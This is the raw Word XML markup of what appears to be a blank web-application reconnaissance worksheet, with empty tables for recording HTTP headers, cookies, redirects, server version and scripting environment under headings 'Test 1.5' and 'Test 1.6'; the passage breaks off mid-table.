          <w:p w14:paraId="7A699447" w14:textId="77777777" w:rsidR="00A33037" w:rsidRPr="003B4C96" w:rsidRDefault="00A33037" w:rsidP="003D31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D3144" w:rsidRPr="003D3144" w14:paraId="06629FCE" w14:textId="77777777" w:rsidTr="0037292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EF6C17D" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="0037292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D3144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5B69E56D" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="00843567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8935ABF" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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80D0431" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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666851F" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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60DCE60" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="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AB32A18" w14:textId="77777777" w:rsidR="003D3144" w:rsidRPr="003D3144" w:rsidRDefault="003D3144" w:rsidP="003D31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7337F" w:rsidRPr="003D3144" w14:paraId="5BCF179E" w14:textId="77777777" w:rsidTr="0037292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A9D57F5" w14:textId="55EC6F99" w:rsidR="0057337F" w:rsidRPr="003D3144" w:rsidRDefault="009F05D2" w:rsidP="0037292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F05D2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Findings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71441463" w14:textId="77777777" w:rsidR="0057337F" w:rsidRPr="003D3144" w:rsidRDefault="0057337F" w:rsidP="0057337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1894D90C" w14:textId="77777777" w:rsidR="00535DB5" w:rsidRDefault="00535DB5" w:rsidP="00535DB5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81763" w14:paraId="67D926ED" w14:textId="77777777" w:rsidTr="00764AD7">
        <w:trPr>
          <w:trHeight w:val="70"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EAA2DDA" w14:textId="77777777" w:rsidR="00D81763" w:rsidRDefault="00D81763" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="01ADB6ED" w14:textId="77777777" w:rsidR="00D81763" w:rsidRDefault="00D81763" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="004F5474" w14:textId="77777777" w:rsidR="00D81763" w:rsidRDefault="00D81763" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2000A6B6" w14:textId="77777777" w:rsidR="00D81763" w:rsidRDefault="00D81763" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3285F9FA" w14:textId="77777777" w:rsidR="00D81763" w:rsidRDefault="00D81763" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7E679C03" w14:textId="77777777" w:rsidR="00D81763" w:rsidRDefault="00D81763" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="905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050"/>
      </w:tblGrid>
      <w:tr w:rsidR="004302A3" w:rsidRPr="00A51A96" w14:paraId="58768C38" w14:textId="77777777" w:rsidTr="001E6AED">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9050" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1D978283" w14:textId="121D6929" w:rsidR="004302A3" w:rsidRPr="006701F2" w:rsidRDefault="004302A3" w:rsidP="0085194C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  <w:color w:val="auto"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Test 1.5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070D4D" w:rsidRPr="00070D4D">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Check the HTTP and HTML Processing by the Browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AE58B8E" w14:textId="77777777" w:rsidR="004302A3" w:rsidRPr="00D71CED" w:rsidRDefault="004302A3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DD11B5" w:rsidRPr="00DD11B5" w14:paraId="27A3B9FB" w14:textId="77777777" w:rsidTr="00784E12">
        <w:trPr>
          <w:trHeight w:val="1475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07578A5" w14:textId="77777777" w:rsidR="00DD11B5" w:rsidRPr="00DD11B5" w:rsidRDefault="00DD11B5" w:rsidP="00784E1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D11B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Analyzed HTTP and HTTPS Request Headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7347E186" w14:textId="77777777" w:rsidR="00DD11B5" w:rsidRPr="00DD11B5" w:rsidRDefault="00DD11B5" w:rsidP="004245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245F0" w:rsidRPr="00DD11B5" w14:paraId="00FAFCC3" w14:textId="77777777" w:rsidTr="00784E12">
        <w:trPr>
          <w:trHeight w:val="197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6189170" w14:textId="28E49A6F" w:rsidR="004245F0" w:rsidRPr="00DD11B5" w:rsidRDefault="00AA6FB1" w:rsidP="00784E1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A6FB1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>HTTP Headers Extracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D2313DD" w14:textId="77777777" w:rsidR="004245F0" w:rsidRDefault="00AA6FB1" w:rsidP="004245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AA6FB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[*Server details, scripting environment, OS information, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60A41A9B" w14:textId="77777777" w:rsidR="00AA6FB1" w:rsidRDefault="00AA6FB1" w:rsidP="004245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1B16026" w14:textId="77777777" w:rsidR="00AA6FB1" w:rsidRDefault="00AA6FB1" w:rsidP="004245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7902C29" w14:textId="5DDCE591" w:rsidR="00AA6FB1" w:rsidRPr="00AA6FB1" w:rsidRDefault="00AA6FB1" w:rsidP="004245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AA6FB1" w:rsidRPr="00DD11B5" w14:paraId="60CE96A7" w14:textId="77777777" w:rsidTr="00784E1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3D8D92B" w14:textId="0407E5E8" w:rsidR="00AA6FB1" w:rsidRPr="00AA6FB1" w:rsidRDefault="00B71ECE" w:rsidP="00784E1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71ECE">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Redirect Paths Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="011013A7" w14:textId="77777777" w:rsidR="00AA6FB1" w:rsidRPr="00AA6FB1" w:rsidRDefault="00AA6FB1" w:rsidP="004245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71ECE" w:rsidRPr="00DD11B5" w14:paraId="3150D5CF" w14:textId="77777777" w:rsidTr="00784E1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8A43F0E" w14:textId="3A2FA588" w:rsidR="00B71ECE" w:rsidRPr="00B71ECE" w:rsidRDefault="00B71ECE" w:rsidP="00784E1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71ECE">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Cookies Sent by Remote Site</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2013C3F2" w14:textId="77777777" w:rsidR="00B71ECE" w:rsidRPr="00AA6FB1" w:rsidRDefault="00B71ECE" w:rsidP="004245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71ECE" w:rsidRPr="00DD11B5" w14:paraId="46DA7A1B" w14:textId="77777777" w:rsidTr="00784E1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627D44F" w14:textId="2C3115AB" w:rsidR="00B71ECE" w:rsidRPr="00B71ECE" w:rsidRDefault="00B71ECE" w:rsidP="00784E1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71ECE">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Headers Sent to the Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0108BA29" w14:textId="77777777" w:rsidR="00B71ECE" w:rsidRPr="00AA6FB1" w:rsidRDefault="00B71ECE" w:rsidP="004245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869EC" w:rsidRPr="00DD11B5" w14:paraId="433B2F2D" w14:textId="77777777" w:rsidTr="00784E1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90121C9" w14:textId="182F263C" w:rsidR="006869EC" w:rsidRPr="00B71ECE" w:rsidRDefault="006869EC" w:rsidP="00784E1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869EC">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Headers Returned by the Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B7A05BE" w14:textId="77777777" w:rsidR="006869EC" w:rsidRPr="00AA6FB1" w:rsidRDefault="006869EC" w:rsidP="004245F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D11B5" w:rsidRPr="00DD11B5" w14:paraId="17522D88" w14:textId="77777777" w:rsidTr="00784E12">
        <w:trPr>
          <w:trHeight w:val="1502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F22A607" w14:textId="77777777" w:rsidR="00DD11B5" w:rsidRPr="00DD11B5" w:rsidRDefault="00DD11B5" w:rsidP="00784E1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D11B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Web Servers and their Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F483E32" w14:textId="77777777" w:rsidR="00DD11B5" w:rsidRPr="00DD11B5" w:rsidRDefault="00DD11B5" w:rsidP="00843567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186F456" w14:textId="77777777" w:rsidR="00DD11B5" w:rsidRPr="00DD11B5" w:rsidRDefault="00DD11B5" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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5E9042E" w14:textId="77777777" w:rsidR="00DD11B5" w:rsidRPr="00DD11B5" w:rsidRDefault="00DD11B5" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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D11B5" w:rsidRPr="00DD11B5" w14:paraId="6B8462C4" w14:textId="77777777" w:rsidTr="00784E12">
        <w:trPr>
          <w:trHeight w:val="1349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6A9858F" w14:textId="77777777" w:rsidR="00DD11B5" w:rsidRPr="00DD11B5" w:rsidRDefault="00DD11B5" w:rsidP="00784E1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D11B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Scripting Environment Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70759FE7" w14:textId="77777777" w:rsidR="00DD11B5" w:rsidRPr="00DD11B5" w:rsidRDefault="00DD11B5" w:rsidP="00DD11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D11B5" w:rsidRPr="00DD11B5" w14:paraId="1308876E" w14:textId="77777777" w:rsidTr="008B3C60">
        <w:trPr>
          <w:trHeight w:val="1547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0CDF12A" w14:textId="77777777" w:rsidR="00DD11B5" w:rsidRPr="00DD11B5" w:rsidRDefault="00DD11B5" w:rsidP="00784E1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D11B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Operating System Used for Developing and Maintaining the Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07A9AAC2" w14:textId="77777777" w:rsidR="00DD11B5" w:rsidRPr="00DD11B5" w:rsidRDefault="00DD11B5" w:rsidP="00DD11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D11B5" w:rsidRPr="00DD11B5" w14:paraId="469451F2" w14:textId="77777777" w:rsidTr="00784E12">
        <w:trPr>
          <w:trHeight w:val="1349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9404E38" w14:textId="77777777" w:rsidR="00DD11B5" w:rsidRPr="00DD11B5" w:rsidRDefault="00DD11B5" w:rsidP="00784E1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D11B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Other Information Obtained from HTTP and HTTPS Headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43058A38" w14:textId="77777777" w:rsidR="00DD11B5" w:rsidRPr="00DD11B5" w:rsidRDefault="00DD11B5" w:rsidP="00DD11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D11B5" w:rsidRPr="00DD11B5" w14:paraId="0EE75C66" w14:textId="77777777" w:rsidTr="00784E1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3189551" w14:textId="77777777" w:rsidR="00DD11B5" w:rsidRPr="00DD11B5" w:rsidRDefault="00DD11B5" w:rsidP="00784E1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D11B5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21252D8D" w14:textId="77777777" w:rsidR="00DD11B5" w:rsidRPr="00DD11B5" w:rsidRDefault="00DD11B5" w:rsidP="00843567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A514DFE" w14:textId="77777777" w:rsidR="00DD11B5" w:rsidRPr="00DD11B5" w:rsidRDefault="00DD11B5" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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C29E5F7" w14:textId="77777777" w:rsidR="00DD11B5" w:rsidRPr="00DD11B5" w:rsidRDefault="00DD11B5" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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E67DC4B" w14:textId="77777777" w:rsidR="00DD11B5" w:rsidRPr="00DD11B5" w:rsidRDefault="00DD11B5" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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17AFF7D" w14:textId="77777777" w:rsidR="00DD11B5" w:rsidRPr="00DD11B5" w:rsidRDefault="00DD11B5" w:rsidP="00843567">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1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6A83ADF" w14:textId="77777777" w:rsidR="00DD11B5" w:rsidRPr="00DD11B5" w:rsidRDefault="00DD11B5" w:rsidP="00DD11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37FA06B2" w14:textId="77777777" w:rsidR="0037648C" w:rsidRPr="00A51A96" w:rsidRDefault="0037648C" w:rsidP="0037648C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648C" w14:paraId="21DC0EC7" w14:textId="77777777" w:rsidTr="0085194C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DDFBF25" w14:textId="77777777" w:rsidR="0037648C" w:rsidRDefault="0037648C" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5BB4B82B" w14:textId="77777777" w:rsidR="0037648C" w:rsidRDefault="0037648C" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3F0A3FA2" w14:textId="77777777" w:rsidR="0037648C" w:rsidRDefault="0037648C" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="073806EB" w14:textId="77777777" w:rsidR="0037648C" w:rsidRDefault="0037648C" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0B6E096A" w14:textId="77777777" w:rsidR="0037648C" w:rsidRDefault="0037648C" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="176BE926" w14:textId="77777777" w:rsidR="0037648C" w:rsidRDefault="0037648C" w:rsidP="0085194C">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="02BCE168" w14:textId="3E8F72A6" w:rsidR="00670DB7" w:rsidRDefault="00670DB7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AC6A5C" w:rsidRPr="000F3EF2" w14:paraId="2E08DC60" w14:textId="77777777" w:rsidTr="001E6AED">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="226594C4" w14:textId="1297CC81" w:rsidR="00AC6A5C" w:rsidRPr="000F3EF2" w:rsidRDefault="00AC6A5C" w:rsidP="008519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1.6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355553">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Identify</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00355553">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Server-Side Technologies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="62DC4BA7" w14:textId="77777777" w:rsidR="0037648C" w:rsidRPr="00C76D50" w:rsidRDefault="0037648C" w:rsidP="000947B4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="4"/>
          <w:szCs w:val="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3037"/>
        <w:gridCol w:w="4495"/>
      </w:tblGrid>
      <w:tr w:rsidR="004005FE" w14:paraId="5E4F779B" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="44347A9A" w14:textId="1C28AC51" w:rsidR="004005FE" w:rsidRDefault="004005FE" w:rsidP="00C06644">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="006353B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>HTTP Response Header Analysis</w:t>
            </w:r>
            <w:r w:rsidRPr="006353B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C5032D3" w14:textId="46144303" w:rsidR="004005FE" w:rsidRPr="00C54B08" w:rsidRDefault="004005FE" w:rsidP="000B6F82">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>HTTP Headers Extracted</w:t>
            </w:r>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A7EA6E7" w14:textId="77777777" w:rsidR="004005FE" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00645DA3">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>[*Server type, version, OS details, scripting environment, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E69BCA6" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="17757CB5" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1BBA8A11" w14:textId="125BB324" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004005FE" w14:paraId="55E3B827" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="29AC4F73" w14:textId="77777777" w:rsidR="004005FE" w:rsidRDefault="004005FE" w:rsidP="00C06644">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5270B5F5" w14:textId="5B0823F1" w:rsidR="004005FE" w:rsidRPr="00C54B08" w:rsidRDefault="004005FE" w:rsidP="000B6F82">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Accepted Ranges &amp; Request Age</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E75C2ED" w14:textId="77777777" w:rsidR="004005FE" w:rsidRDefault="004005FE" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2E93EE26" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="49016746" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004005FE" w14:paraId="46BE1937" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C1C9433" w14:textId="77777777" w:rsidR="004005FE" w:rsidRDefault="004005FE" w:rsidP="00C06644">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0F6E2ED0" w14:textId="1FC20473" w:rsidR="004005FE" w:rsidRPr="00C54B08" w:rsidRDefault="004005FE" w:rsidP="000B6F82">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C54B08">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Proxy Authentication Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4495" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D0980FD" w14:textId="77777777" w:rsidR="004005FE" w:rsidRDefault="004005FE" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3DC287A8" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1106A394" w14:textId="77777777" w:rsidR="00102667" w:rsidRDefault="00102667" w:rsidP="00960A4F">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004005FE" w14:paraId="2A31FB1D" w14:textId="77777777" w:rsidTr="000B6F82">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1818" w:type="dxa"/>
            <w:vMerge/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="05DA3285" w14:textId="77777777" w:rsidR="004005FE" w:rsidRDefault="004005FE" w:rsidP="00C06644">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="left"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3037" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
